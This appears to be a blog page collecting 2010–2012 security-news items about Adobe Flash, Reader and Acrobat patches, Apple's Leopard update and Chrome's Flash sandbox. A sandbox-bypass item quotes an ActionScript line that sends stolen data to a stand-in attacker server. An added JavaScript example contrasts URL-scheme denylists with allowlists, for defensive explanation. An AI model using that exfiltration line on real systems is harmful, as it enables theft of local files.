December 18, 2018

In brief: Microsoft updates Internet Explorer 10 to address vulnerabilities in Adobe Flash Player

(LiveHacking.Com) – Adobe has released a new version of its ubiquitous Flash Player to address vulnerabilities that could cause a crash and potentially be exploited by an attacker to infect a PC with malware. As a result Microsoft has issued a patch to IE10 to update the browser’s built-in version of Flash Player.

Microsoft has revised Security Advisory 2755801 to reflect the changes. The new version of IE is available for all supported editions of Windows 8, Windows Server 2012, and Windows RT. For more information about the update, including download links, see Microsoft Knowledge Base Article 2770041.

“We remain committed to taking the appropriate actions to help protect customers and will continue to work closely with Adobe to deliver quality protections that are aligned with Adobe’s update process,” said Dave Forstrom, Director, Microsoft Trustworthy Computing.

Adobe has released a security update for Adobe Flash Player

(LiveHacking.Com) – Adobe has released a security update for Adobe Flash Player to address vulnerabilities that could cause a crash and potentially be exploited by an attacker to infect a PC with malware.

The update applies to Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh, Adobe Flash Player 11.2.202.243 and earlier versions for Linux, Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x.

The update addresses six different memory issues and a security bypass vulnerability:

  • Buffer overflow vulnerabilities that could lead to code execution (CVE-2012-5274, CVE-2012-5275, CVE-2012-5276, CVE-2012-5277, CVE-2012-5280).
  • Memory corruption vulnerabilities that could lead to code execution (CVE-2012-5279).
  • Security bypass vulnerability that could lead to code execution (CVE-2012-5278).

If you need to check the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select “About Adobe (or Macromedia) Flash Player” from the menu. If you have multiple browsers installed, perform the check for each browser. Android users should tap on Settings > Applications > Manage Applications > Adobe Flash Player x.x.

The built-in version of Flash Player has also been updated in Internet Explorer 10 and Chrome.

Adobe updates Flash Player to fix 25 security vulnerabilities

(LiveHacking.Com) – Adobe has released a new version of its Flash Player to address a multitude of security vulnerabilities. The new release fixes at least 25 separate security flaws. Adobe also released a security patch for its Adobe AIR software. According to Adobe, “these updates address vulnerabilities that could cause a crash and potentially allow an attacker to take control of the affected system.”

The update affects all Flash platforms including Windows, Mac, Linux and Android. Adobe has released security updates for:

  • Adobe Flash Player 11.4.402.278 and earlier versions for Windows
  • Adobe Flash Player 11.4.402.265 and earlier versions for Macintosh
  • Adobe Flash Player 11.2.202.238 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.17 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.16 and earlier versions for Android 3.x and 2.x

For Adobe AIR users, all versions prior to 3.4.0.2540 on Windows, Macintosh and Android should update to Adobe AIR 3.4.0.2710.

There are two categories of vulnerabilities fixed in this release: buffer overflow vulnerabilities that could lead to code execution and memory corruption vulnerabilities that could also lead to code execution.

If you are still using Flash Player 10 and you cannot update to Flash Player 11.4.402.287, Adobe has released Flash Player 10.3.183.29, which can be downloaded here.

Apple Releases First OS X 10.5 Update For Nearly a Year – But Doesn’t Patch Any Known Vulnerabilities

(LiveHacking.Com) – Apple have made the interesting move of releasing a security update for OS X 10.5 Leopard which doesn’t actually patch any known vulnerabilities. Instead the update for the oldest of the OS X versions that runs on Intel Macs disables out-of-date versions of Adobe Flash Player.

Leopard Security Update 2012-003 disables Adobe Flash Player if it is older than 10.1.102.64. It does this by moving its files to a new directory. If the update disables Flash Player, the user is presented with the option to install an updated version from the Adobe website. Apple disabled Flash Player older than 10.1.102.64 on OS X Snow Leopard and OS X Lion a few days ago.

Apple have also released a version of the Flashback malware removal tool designed for Leopard. Apple released the same tool for Snow Leopard and Lion almost a month ago. According to the advisory: “This update runs a malware removal tool that will remove the most common variants of the Flashback malware. If the Flashback malware is found, it presents a dialog notifying the user that malware was removed. There is no indication to the user if malware is not found.”

Leopard has been left languishing without any updates from Apple for nearly a year. The last application update was for iTunes in November 2011, while the last operating system level update was in June of the same year.

There are, of course, still users of OS X 10.4 and OS X 10.5 for the PowerPC, which it seems Apple has completely abandoned.

Bypass Flash Player Sandbox

Adobe Flash applications that are run locally can access local files and transfer them to an attacker’s server.

Adobe has implemented a number of sandboxes to enhance the user’s security. However, the restrictions a sandbox imposes depend on the origin and access rights of the SWF file. Local SWF files run within the local-with-file-system sandbox and are permitted to access local files, but not the network.

However, security researcher Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. It is therefore possible to send files to a server using the file: protocol handler, although this is only possible within the local area network.

Billy Rios has also identified another protocol handler, mhtml, which can be used to send data from the victim PC to remote servers using the ActionScript command: getURL('mhtml:http://attacker-server.com/stolen-data-here', '');
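
The weakness described above is a denylist of URL schemes standing guard over a "local files, no network" policy. The following added example (JavaScript, not code from Adobe or from the researcher; the function names, scheme sets and sample URLs are assumptions constructed for illustration) contrasts that check with an allowlist that also refuses file: URLs naming a remote host.

```javascript
// Added example: scheme denylist vs. allowlist for a "local files, no network" policy.
// Function names, scheme sets and sample URLs are constructed for illustration.

// Leading URL scheme, lowercased (RFC 3986 syntax), or null if there is none.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url.trim());
  return m ? m[1].toLowerCase() : null;
}

// Denylist: refuse the schemes known to reach the network, permit everything else.
const DENIED = new Set(["http", "https"]);
function denylistAllows(url) {
  const s = schemeOf(url);
  return s !== null && !DENIED.has(s);
}

// Allowlist: permit only file:, and only when it names no remote host.
// file://host/share and file:////host/share (UNC form) both resolve over the network.
const ALLOWED = new Set(["file"]);
function allowlistAllows(url) {
  const s = schemeOf(url);
  if (s === null || !ALLOWED.has(s)) return false;
  const rest = url.trim().slice(s.length + 1).replace(/\\/g, "/");
  const m = /^\/\/([^\/]*)(.*)$/.exec(rest);
  const host = m ? m[1].toLowerCase() : "";
  const path = m ? m[2] : rest;
  if (host !== "" && host !== "localhost") return false;
  return !path.startsWith("//");
}

// URLs the denylist lets through that the allowlist refuses.
function policyGaps(urls) {
  return urls.filter((u) => denylistAllows(u) && !allowlistAllows(u));
}

// Constructed sample requests from a local SWF.
const SAMPLES = [
  "http://collector.example.test/upload",
  "HTTPS://collector.example.test/upload",
  "mhtml:http://collector.example.test/upload",
  "file://fileserver.example.test/share/drop.txt",
  "file:////fileserver.example.test/share/drop.txt",
  "file:///C:/Users/alice/notes.txt",
];

console.log(policyGaps(SAMPLES));
```

The denylist only sees the outer scheme, so a wrapped URL such as mhtml:http://… passes it, while the allowlist refuses anything it does not explicitly recognise as local.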

Chrome to run Flash Player in a sandbox

The latest developer version (dev channel) of the Chrome browser for Windows is equipped with a sandbox for running Adobe’s Flash plug-in. If an attacker succeeds in exploiting a security vulnerability in the plug-in, the sandbox should cushion the worst of the blow by blocking access to critical system files. Adobe Flash Player is a godsend for attackers, because almost everyone has it installed on their system and new vulnerabilities in Flash are constantly being discovered.

Read the full story here.

Source:[TheHSecurity]

Unscheduled Security Update for Adobe Reader and Acrobat

The unscheduled security update for Adobe Reader and Acrobat fixes more than 18 security holes. Here is the release note from the Adobe Security Bulletin:

Critical vulnerabilities have been identified in Adobe Reader 9.4 (and earlier versions) for Windows, Macintosh and UNIX, and Adobe Acrobat 9.4 (and earlier 9.x versions) for Windows and Macintosh. These vulnerabilities could cause the application to crash and potentially allow an attacker to take control of the affected system.

In addition to addressing CVE-2010-3654 noted in Security Advisory APSA10-05 and CVE-2010-4091 referenced in the Adobe PSIRT blog (“Potential issue in Adobe Reader”), these updates also incorporate the Adobe Flash Player update as noted in Security Bulletin APSB10-26.

Adobe recommends users of Adobe Reader 9.4 and earlier versions for Windows and Macintosh update to Adobe Reader 9.4.1, available now. Adobe recommends users of Adobe Reader 9.4 and earlier versions for UNIX update to Adobe Reader 9.4.1, expected to be available on November 30, 2010. Adobe recommends users of Adobe Acrobat 9.4 and earlier 9.x versions for Windows and Macintosh update to Adobe Acrobat 9.4.1.

Note that these updates represent an out-of-cycle release. The next quarterly security updates for Adobe Reader and Acrobat are scheduled for February 8, 2011.

Please visit Adobe Security Bulletins for more information about this update.

Source:[Adobe Security Bulletins]